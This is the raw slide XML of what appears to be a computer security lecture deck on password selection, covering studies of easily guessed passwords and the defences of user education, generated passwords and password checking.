          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>all possible combinations of characters to discover a password. Instead, password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>crackers rely on the fact that some people choose easily guessable passwords.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Some users, when permitted to choose their own password, pick one that is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>absurdly short. The results of one study at Purdue University are shown in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Table 11.3. The study observed password change choices on 54 machines, representing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>approximately 7000 user accounts. Almost 3% of the passwords were three</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>characters or fewer in length. An attacker could begin the attack by exhaustively</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>testing all possible passwords of length 3 or fewer. A simple remedy is for the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>system to reject any password choice of fewer than, say, six characters or even to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>require that all passwords be exactly eight characters in length. Most users would</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>not complain about such a restriction.</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Password length is only part of the problem. Many people, when permitted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>to choose their own password, pick a password that is guessable, such as their</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>own name, their street name, a common dictionary word, and so forth. This makes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> the job of password cracking straightforward. The cracker simply has to test the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>password file against lists of likely passwords. Because many people use guessable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>passwords, such a strategy should succeed on virtually all systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="zh-CN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="3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Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{242AE9DB-708D-470C-8C93-6BEBCCC2FFC5}"/>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585FCA55-3997-47FB-B068-8E911D58163F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>One demonstration of the effectiveness of guessing is reported in [KLEI90].</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>From a variety of sources, the author collected UNIX password files, containing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>nearly 14,000 encrypted passwords. The result, which the author rightly characterizes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>as frightening, is shown in Table 11.4. In all, nearly one-fourth of the passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>were guessed. The following strategy was used:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>1.  Try the user’s name, initials, account name, and other relevant personal information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>In all, 130 different permutations for each user were tried.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>2.  Try words from various dictionaries. The author compiled a dictionary of over</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>60,000 words, including the online dictionary on the system itself, and various</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>other lists as shown.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>3.  Try various permutations on the words from step 2. This included making the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>first letter uppercase or a control character, making the entire word uppercase,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>reversing the word, changing the letter “o” to the digit “zero,” and so on. These</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>permutations added another 1 million words to the list.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>4.  Try various capitalization permutations on the words from step 2 that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>were not considered in step 3. This added almost 2 million additional words</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>to the list.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>Thus, the test involved in the neighborhood of 3 million words. Using the fastest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>Thinking Machines implementation listed earlier, the time to encrypt all these</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>words for all possible salt values is under an hour. Keep in mind that such a thorough</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>search could produce a success rate of about 25%, whereas even a single hit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>may be enough to gain a wide range of privileges on a system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245764" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35388975-34A8-45DE-92D1-336C7BEF465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115BB352-0465-4B17-B8AB-DE068C9C0F20}" type="slidenum">
              <a:rPr lang="en-AU" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>191</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="1200">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1031">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E86E845E-7812-40A2-9AF3-B62A979F83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7FB5E0F5-B2BF-41C5-B4CD-FB216397FE1C}" type="slidenum">
              <a:rPr lang="en-AU" altLang="zh-CN" sz="1200" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>192</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="1200">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247811" name="Rectangle 1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{645A717E-9B6B-4139-AAE4-57250C0B9569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247812" name="Rectangle 1027">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8C2C313-2F21-4AFE-8AA1-7531EF9104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MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>The lesson from the two experiments just described (Tables 11.3 and 11.4) is that,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>left to their own devices, many users choose a password that is too short or too easy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>to guess. At the other extreme, if users are assigned passwords consisting of eight</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>randomly selected printable characters, password cracking is effectively impossible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>But it would be almost as impossible for most users to remember their passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Fortunately, even if we limit the password universe to strings of characters that are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> reasonably memorable, the size of the universe is still too large to permit practical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>cracking. Our goal, then, is to eliminate guessable passwords while allowing the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>to select a password that is memorable. Four basic techniques are in use:</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User education</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Computer-generated passwords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Reactive password checking</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Proactive password checking</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Users can be told the importance of using hard-to-guess passwords and can be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>provided with guidelines for selecting strong passwords. This user education  strategy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>is unlikely to succeed at most installations, particularly where there is a large</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>user population or a lot of turnover. Many users will simply ignore the guidelines.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Others may not be good judges of what is a strong password. For example, many</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>users (mistakenly) believe that reversing a word or capitalizing the last letter makes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>a password unguessable.</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Computer-generated passwords also have problems. If the passwords are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>quite random in nature, users will not be able to remember them. Even if the password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>is pronounceable, the user may have difficulty remembering it and so be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>tempted to write it down. In general, computer-generated password schemes have a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>history of poor acceptance by users. FIPS PUB 181 defines one of the best-designed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>automated password generators. The standard includes not only a description of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>the approach but also a complete listing of the C source code of the algorithm. The</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
